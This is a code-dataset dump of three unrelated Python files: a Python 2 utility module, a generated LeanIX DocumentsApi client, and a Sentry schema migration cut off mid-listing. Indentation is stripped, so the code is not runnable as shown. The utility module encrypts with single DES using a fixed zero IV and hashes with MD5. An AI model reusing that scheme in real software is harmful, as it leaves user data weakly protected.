from os.path import abspath, join as path_join, dirname, basename, splitext
from fnmatch import fnmatch
from hashlib import md5
from base64 import b64encode, b64decode
from inspect import ismodule, getmembers
from bson.objectid import ObjectId
try:
from pyDes import des, triple_des, PAD_PKCS5, CBC
_enc_key = lambda length: __conf__.ENCRYPT_KEY.zfill(length)[:length]
_cipher = lambda: des(_enc_key(8), mode = CBC, IV = "\0" * 8, padmode = PAD_PKCS5)
except:
pass
### 应用程序路径函数 ####################################################################################
ROOT_PATH = dirname(abspath(argv[0]))
app_path = lambda n: path_join(ROOT_PATH, n)
template_path = lambda n: path_join(ROOT_PATH, "{0}/{1}".format(__conf__.TEMPLATE_DIR_NAME, n))
static_path = lambda n: path_join(ROOT_PATH, "{0}/{1}".format(__conf__.STATIC_DIR_NAME, n))
### 装饰器 #############################################################################################
def staticclass(cls):
def new(cls, *args, **kwargs):
raise RuntimeError("Static Class")
setattr(cls, "__new__", staticmethod(new))
return cls
class sealedclass(type):
"""
metaclass: Sealed Class
"""
_types = set()
def __init__(cls, name, bases, attr):
for t in bases:
if t in cls._types: raise SyntaxError("sealed class")
cls._types.add(cls)
class partialclass(type):
"""
metaclass: Partial Class
class A(object):
y = 456
def test(self): print "test"
class B(object):
__metaclass__ = partialclass
__mainclass__ = A
x = 1234
def do(self):
self.test()
print self.x, self.y
A().do()
"""
def __init__(cls, name, bases, attr):
print "cls:", cls
print "name:", name
print "bases:", bases
print "attr:", attr
main_class = attr.pop("__mainclass__")
map(lambda a: setattr(main_class, a[0], a[1]), [(k, v) for k, v in attr.items() if "__" not in k])
### 杂类函数 ############################################################################################
def get_modules(pkg_name, module_filter = None):
"""
返回包中所有符合条件的模块。
参数:
pkg_name 包名称
module_filter 模块名过滤器 def (module_name)
"""
path = app_path(pkg_name)
#py_filter = lambda f: all((fnmatch(f, "*.py"), not f.startswith("__"), module_filter and module_filter(f) or True))
py_filter = lambda f: all((fnmatch(f, "*.pyc") or fnmatch(f, "*.py"), not f.startswith("__"), module_filter and module_filter(f) or True))
names = [splitext(n)[0] for n in listdir(path) if py_filter(n)]
return [__import__("{0}.{1}".format(pkg_name, n)).__dict__[n] for n in names]
def get_members(pkg_name, module_filter = None, member_filter = None):
"""
返回包中所有符合条件的模块成员。
参数:
pkg_name 包名称
module_filter 模块名过滤器 def (module_name)
member_filter 成员过滤器 def member_filter(module_member_object)
"""
modules = get_modules(pkg_name, module_filter)
ret = {}
for m in modules:
members = dict(("{0}.{1}".format(v.__module__, k), v) for k, v in getmembers(m, member_filter))
ret.update(members)
return ret
def set_default_encoding():
"""
设置系统默认编码
"""
import sys, locale
reload(sys)
lang, coding = locale.getdefaultlocale()
#sys.setdefaultencoding(coding)
def conv_mongo_object(d):
"""
将 MongoDB 返回结果中的:
(1) Unicode 还原为 str。
(2) ObjectId 还原为 str。
"""
if isinstance(d, (unicode, ObjectId, datetime)):
return str(d)
elif isinstance(d, (list, tuple)):
return [conv_mongo_object(x) for x in d]
elif isinstance(d, dict):
return dict([(conv_mongo_object(k), conv_mongo_object(v)) for k, v in d.items()])
else:
return d
mongo_conv = conv_mongo_object
### 哈希加密函数 ########################################################################################
def hash2(o):
"""
哈希函数
"""
return md5(str(o)).hexdigest()
def encrypt(s, base64 = False):
"""
对称加密函数
"""
e = _cipher().encrypt(s)
return base64 and b64encode(e) or e
def decrypt(s, base64 = False):
"""
对称解密函数
"""
return _cipher().decrypt(base64 and b64decode(s) or s)
### 参数检查函数 ########################################################################################
def not_null(*args):
"""
检查参数不为None
"""
if not all(map(lambda v: v is not None, args)):
raise ValueError("Argument must be not None/Null!")
def not_empty(*args):
"""
检查参数不为空
"""
if not all(args):
raise ValueError("Argument must be not None/Null/Zero/Empty!")
def args_range(min_value, max_value, *args):
"""
检查参数范围
"""
not_null(*args)
if not all(map(lambda v: min_value <= v <= max_value, args)):
raise ValueError("Argument must be between {0} and {1}!".format(min_value, max_value))
def args_length(min_len, max_len, *args):
"""
检查参数长度
"""
not_null(*args)
if not all(map(lambda v: min_len <= len(v) <= max_len, args)):
raise ValueError("Argument length must be between {0} and {1}!".format(min_len, max_len))
__all__ = ["ROOT_PATH", "app_path", "template_path", "static_path",
"staticclass", "sealedclass", "partialclass",
"get_modules", "get_members",
"conv_mongo_object", "mongo_conv", "set_default_encoding",
"hash2", "encrypt", "decrypt",
"not_null", "not_empty", "args_range", "args_length"]
| mit | 6,438,945,186,189,151,000 | 24.227273 | 142 | 0.507799 | false |
leanix/leanix-sdk-python | src/leanix/DocumentsApi.py | 1 | 11645 | #!/usr/bin/env python
"""
The MIT License (MIT)
Copyright (c) 2017 LeanIX GmbH
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
the Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually.
"""
import sys
import os
from models import *
class DocumentsApi(object):
def __init__(self, apiClient):
self.apiClient = apiClient
def getDocuments(self, **kwargs):
"""
Read all documents
Args:
relations, bool: If set to true, all relations of the Fact Sheet are fetched as well. Fetching all relations can be slower. Default: false. (optional)
filter, str: Full-text filter (optional)
referenceSystem, str: Reference system filter, e.g. Signavio (optional)
referenceID, str: ReferenceID, e.g. Signavio ID (optional)
factSheetID, str: FactSheetID, e.g. LeanIX ID (optional)
Returns: Array[Document]
"""
allParams = ['relations', 'filter', 'referenceSystem', 'referenceID', 'factSheetID']
params = locals()
for (key, val) in params['kwargs'].iteritems():
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method getDocuments" % key)
params[key] = val
del params['kwargs']
resourcePath = '/documents'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'GET'
queryParams = {}
headerParams = {}
formParams = {}
bodyParam = None
if ('relations' in params):
queryParams['relations'] = self.apiClient.toPathValue(params['relations'])
if ('filter' in params):
queryParams['filter'] = self.apiClient.toPathValue(params['filter'])
if ('referenceSystem' in params):
queryParams['referenceSystem'] = self.apiClient.toPathValue(params['referenceSystem'])
if ('referenceID' in params):
queryParams['referenceID'] = self.apiClient.toPathValue(params['referenceID'])
if ('factSheetID' in params):
queryParams['factSheetID'] = self.apiClient.toPathValue(params['factSheetID'])
if formParams:
headerParams['Content-type'] = 'application/x-www-form-urlencoded'
# postData = (formParams if formParams else bodyParam)
postData = params['body'] if 'body' in params else None
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'Array[Document]')
return responseObject
def createDocument(self, **kwargs):
"""
Create a new Document
Args:
body, Document: Message-Body (optional)
Returns: Document
"""
allParams = ['body']
params = locals()
for (key, val) in params['kwargs'].iteritems():
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method createDocument" % key)
params[key] = val
del params['kwargs']
resourcePath = '/documents'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'POST'
queryParams = {}
headerParams = {}
formParams = {}
bodyParam = None
if formParams:
headerParams['Content-type'] = 'application/x-www-form-urlencoded'
if ('' in params):
bodyParam = params['']
# postData = (formParams if formParams else bodyParam)
postData = params['body'] if 'body' in params else None
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'Document')
return responseObject
def getDocument(self, ID, **kwargs):
"""
Read a Document by a given ID
Args:
ID, str: Unique ID (required)
relations, bool: If set to true, all relations of the Fact Sheet are fetched as well. Fetching all relations can be slower. Default: false. (optional)
Returns: Document
"""
allParams = ['ID', 'relations']
params = locals()
for (key, val) in params['kwargs'].iteritems():
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method getDocument" % key)
params[key] = val
del params['kwargs']
resourcePath = '/documents/{ID}'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'GET'
queryParams = {}
headerParams = {}
formParams = {}
bodyParam = None
if ('relations' in params):
queryParams['relations'] = self.apiClient.toPathValue(params['relations'])
if ('ID' in params):
replacement = str(self.apiClient.toPathValue(params['ID']))
resourcePath = resourcePath.replace('{' + 'ID' + '}',
replacement)
if formParams:
headerParams['Content-type'] = 'application/x-www-form-urlencoded'
# postData = (formParams if formParams else bodyParam)
postData = params['body'] if 'body' in params else None
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'Document')
return responseObject
def updateDocument(self, ID, **kwargs):
"""
Update a Document by a given ID
Args:
ID, str: Unique ID (required)
body, Document: Message-Body (optional)
Returns: Document
"""
allParams = ['ID', 'body']
params = locals()
for (key, val) in params['kwargs'].iteritems():
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method updateDocument" % key)
params[key] = val
del params['kwargs']
resourcePath = '/documents/{ID}'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'PUT'
queryParams = {}
headerParams = {}
formParams = {}
bodyParam = None
if ('ID' in params):
replacement = str(self.apiClient.toPathValue(params['ID']))
resourcePath = resourcePath.replace('{' + 'ID' + '}',
replacement)
if formParams:
headerParams['Content-type'] = 'application/x-www-form-urlencoded'
if ('' in params):
bodyParam = params['']
# postData = (formParams if formParams else bodyParam)
postData = params['body'] if 'body' in params else None
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'Document')
return responseObject
def deleteDocument(self, ID, **kwargs):
"""
Delete a Document by a given ID
Args:
ID, str: Unique ID (required)
Returns:
"""
allParams = ['ID']
params = locals()
for (key, val) in params['kwargs'].iteritems():
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method deleteDocument" % key)
params[key] = val
del params['kwargs']
resourcePath = '/documents/{ID}'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'DELETE'
queryParams = {}
headerParams = {}
formParams = {}
bodyParam = None
if ('ID' in params):
replacement = str(self.apiClient.toPathValue(params['ID']))
resourcePath = resourcePath.replace('{' + 'ID' + '}',
replacement)
if formParams:
headerParams['Content-type'] = 'application/x-www-form-urlencoded'
# postData = (formParams if formParams else bodyParam)
postData = params['body'] if 'body' in params else None
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams)
def updateDataObject(self, ID, **kwargs):
"""
Update the data object for the given document ID
Args:
ID, str: Unique ID (required)
body, DataObject: Message-Body (optional)
Returns: DataObject
"""
allParams = ['ID', 'body']
params = locals()
for (key, val) in params['kwargs'].iteritems():
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method updateDataObject" % key)
params[key] = val
del params['kwargs']
resourcePath = '/documents/{ID}/dataobjects'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'PUT'
queryParams = {}
headerParams = {}
formParams = {}
bodyParam = None
if ('ID' in params):
replacement = str(self.apiClient.toPathValue(params['ID']))
resourcePath = resourcePath.replace('{' + 'ID' + '}',
replacement)
if formParams:
headerParams['Content-type'] = 'application/x-www-form-urlencoded'
if ('' in params):
bodyParam = params['']
# postData = (formParams if formParams else bodyParam)
postData = params['body'] if 'body' in params else None
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'DataObject')
return responseObject
| mit | -3,196,921,589,828,660,000 | 30.136364 | 162 | 0.575784 | false |
mvaled/sentry | src/sentry/south_migrations/0480_incidentactivity.py | 1 | 136910 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
# Flag to indicate if this migration is too risky
# to run online and needs to be coordinated for offline
is_dangerous = False
def forwards(self, orm):
# Adding model 'IncidentActivity'
db.create_table('sentry_incidentactivity', (
('id', self.gf('sentry.db.models.fields.bounded.BoundedBigAutoField')(primary_key=True)),
('incident', self.gf('sentry.db.models.fields.foreignkey.FlexibleForeignKey')(
to=orm['sentry.Incident'])),
('user', self.gf('sentry.db.models.fields.foreignkey.FlexibleForeignKey')(
to=orm['sentry.User'], null=True)),
('type', self.gf('django.db.models.fields.IntegerField')()),
('value', self.gf('django.db.models.fields.TextField')(null=True)),
('previous_value', self.gf('django.db.models.fields.TextField')(null=True)),
('comment', self.gf('django.db.models.fields.TextField')(null=True)),
('event_stats_snapshot', self.gf('sentry.db.models.fields.foreignkey.FlexibleForeignKey')(
to=orm['sentry.TimeSeriesSnapshot'], null=True)),
('date_added', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now)),
))
db.send_create_signal('sentry', ['IncidentActivity'])
# Adding model 'TimeSeriesSnapshot'
db.create_table('sentry_timeseriessnapshot', (
('id', self.gf('sentry.db.models.fields.bounded.BoundedBigAutoField')(primary_key=True)),
('start', self.gf('django.db.models.fields.DateTimeField')()),
('end', self.gf('django.db.models.fields.DateTimeField')()),
('values', self.gf('sentry.db.models.fields.array.ArrayField')(
of=(u'django.db.models.fields.IntegerField', [], {}))),
('period', self.gf('django.db.models.fields.IntegerField')()),
('date_added', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now)),
))
db.send_create_signal('sentry', ['TimeSeriesSnapshot'])
def backwards(self, orm):
# Deleting model 'IncidentActivity'
db.delete_table('sentry_incidentactivity')
# Deleting model 'TimeSeriesSnapshot'
db.delete_table('sentry_timeseriessnapshot')
models = {
'sentry.activity': {
'Meta': {'unique_together': '()', 'object_name': 'Activity', 'index_together': '()'},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True'})
},
'sentry.apiapplication': {
'Meta': {'unique_together': '()', 'object_name': 'ApiApplication', 'index_together': '()'},
'allowed_origins': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'client_id': ('django.db.models.fields.CharField', [], {'default': "'12bc89ca7374404ea6921393b99c2e83ca9087accd2345a19bc5c5fc3892410a'", 'unique': 'True', 'max_length': '64'}),
'client_secret': ('sentry.db.models.fields.encrypted.EncryptedTextField', [], {'default': "'3b5eb3fdb9a44c908cc9392a5fd7b133e999526dea0d455ea24fc3cd719a22c0'"}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'homepage_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'default': "'Quiet Spaniel'", 'max_length': '64', 'blank': 'True'}),
'owner': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"}),
'privacy_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True'}),
'redirect_uris': ('django.db.models.fields.TextField', [], {}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'terms_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True'})
},
'sentry.apiauthorization': {
'Meta': {'unique_together': "(('user', 'application'),)", 'object_name': 'ApiAuthorization', 'index_together': '()'},
'application': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ApiApplication']", 'null': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'scope_list': ('sentry.db.models.fields.array.ArrayField', [], {'of': (u'django.db.models.fields.TextField', [], {})}),
'scopes': ('django.db.models.fields.BigIntegerField', [], {'default': 'None'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.apigrant': {
'Meta': {'unique_together': '()', 'object_name': 'ApiGrant', 'index_together': '()'},
'application': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ApiApplication']"}),
'code': ('django.db.models.fields.CharField', [], {'default': "'20e6168c01b8433daaf1d95b568cec7e'", 'max_length': '64', 'db_index': 'True'}),
'expires_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2019, 5, 16, 0, 0)', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'redirect_uri': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'scope_list': ('sentry.db.models.fields.array.ArrayField', [], {'of': (u'django.db.models.fields.TextField', [], {})}),
'scopes': ('django.db.models.fields.BigIntegerField', [], {'default': 'None'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.apikey': {
'Meta': {'unique_together': '()', 'object_name': 'ApiKey', 'index_together': '()'},
'allowed_origins': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'}),
'label': ('django.db.models.fields.CharField', [], {'default': "'Default'", 'max_length': '64', 'blank': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'key_set'", 'to': "orm['sentry.Organization']"}),
'scope_list': ('sentry.db.models.fields.array.ArrayField', [], {'of': (u'django.db.models.fields.TextField', [], {})}),
'scopes': ('django.db.models.fields.BigIntegerField', [], {'default': 'None'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'})
},
'sentry.apitoken': {
'Meta': {'unique_together': '()', 'object_name': 'ApiToken', 'index_together': '()'},
'application': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ApiApplication']", 'null': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'expires_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2019, 6, 15, 0, 0)', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'refresh_token': ('django.db.models.fields.CharField', [], {'default': "'1baed9fb48f145d2ac57b013160dc650e4c940d6c5f14789a331cf28b3af7c45'", 'max_length': '64', 'unique': 'True', 'null': 'True'}),
'scope_list': ('sentry.db.models.fields.array.ArrayField', [], {'of': (u'django.db.models.fields.TextField', [], {})}),
'scopes': ('django.db.models.fields.BigIntegerField', [], {'default': 'None'}),
'token': ('django.db.models.fields.CharField', [], {'default': "'cde3d55c0f444c42acd08de782b5f7fcf3a0c44d35a94cb4b40472b82a437a0d'", 'unique': 'True', 'max_length': '64'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.assistantactivity': {
'Meta': {'unique_together': "(('user', 'guide_id'),)", 'object_name': 'AssistantActivity', 'db_table': "'sentry_assistant_activity'", 'index_together': '()'},
'dismissed_ts': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'guide_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'useful': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"}),
'viewed_ts': ('django.db.models.fields.DateTimeField', [], {'null': 'True'})
},
'sentry.auditlogentry': {
'Meta': {'unique_together': '()', 'object_name': 'AuditLogEntry', 'index_together': '()'},
'actor': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'blank': 'True', 'related_name': "u'audit_actors'", 'null': 'True', 'to': "orm['sentry.User']"}),
'actor_key': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ApiKey']", 'null': 'True', 'blank': 'True'}),
'actor_label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39', 'null': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'target_object': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'target_user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'blank': 'True', 'related_name': "u'audit_targets'", 'null': 'True', 'to': "orm['sentry.User']"})
},
'sentry.authenticator': {
'Meta': {'unique_together': "(('user', 'type'),)", 'object_name': 'Authenticator', 'db_table': "'auth_authenticator'", 'index_together': '()'},
'config': ('sentry.db.models.fields.encrypted.EncryptedPickledObjectField', [], {}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedAutoField', [], {'primary_key': 'True'}),
'last_used_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.authidentity': {
'Meta': {'unique_together': "(('auth_provider', 'ident'), ('auth_provider', 'user'))", 'object_name': 'AuthIdentity', 'index_together': '()'},
'auth_provider': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.AuthProvider']"}),
'data': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'last_synced': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_verified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.authprovider': {
'Meta': {'unique_together': '()', 'object_name': 'AuthProvider', 'index_together': '()'},
'config': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'default_global_access': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'default_role': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '50'}),
'default_teams': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.Team']", 'symmetrical': 'False', 'blank': 'True'}),
'flags': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_sync': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']", 'unique': 'True'}),
'provider': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'sync_time': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'})
},
'sentry.broadcast': {
'Meta': {'unique_together': '()', 'object_name': 'Broadcast', 'index_together': '()'},
'cta': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_expires': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2019, 5, 23, 0, 0)', 'null': 'True', 'blank': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
'link': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'upstream_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'})
},
'sentry.broadcastseen': {
'Meta': {'unique_together': "(('broadcast', 'user'),)", 'object_name': 'BroadcastSeen', 'index_together': '()'},
'broadcast': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Broadcast']"}),
'date_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.commit': {
'Meta': {'unique_together': "(('repository_id', 'key'),)", 'object_name': 'Commit', 'index_together': "(('repository_id', 'date_added'),)"},
'author': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.CommitAuthor']", 'null': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'message': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'repository_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {})
},
'sentry.commitauthor': {
'Meta': {'unique_together': "(('organization_id', 'email'), ('organization_id', 'external_id'))", 'object_name': 'CommitAuthor', 'index_together': '()'},
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'external_id': ('django.db.models.fields.CharField', [], {'max_length': '164', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'})
},
'sentry.commitfilechange': {
'Meta': {'unique_together': "(('commit', 'filename'),)", 'object_name': 'CommitFileChange', 'index_together': '()'},
'commit': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Commit']"}),
'filename': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '1'})
},
'sentry.counter': {
'Meta': {'unique_together': '()', 'object_name': 'Counter', 'db_table': "'sentry_projectcounter'", 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'unique': 'True'}),
'value': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.dashboard': {
'Meta': {'unique_together': "(('organization', 'title'),)", 'object_name': 'Dashboard', 'index_together': '()'},
'created_by': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'sentry.deletedorganization': {
'Meta': {'unique_together': '()', 'object_name': 'DeletedOrganization', 'index_together': '()'},
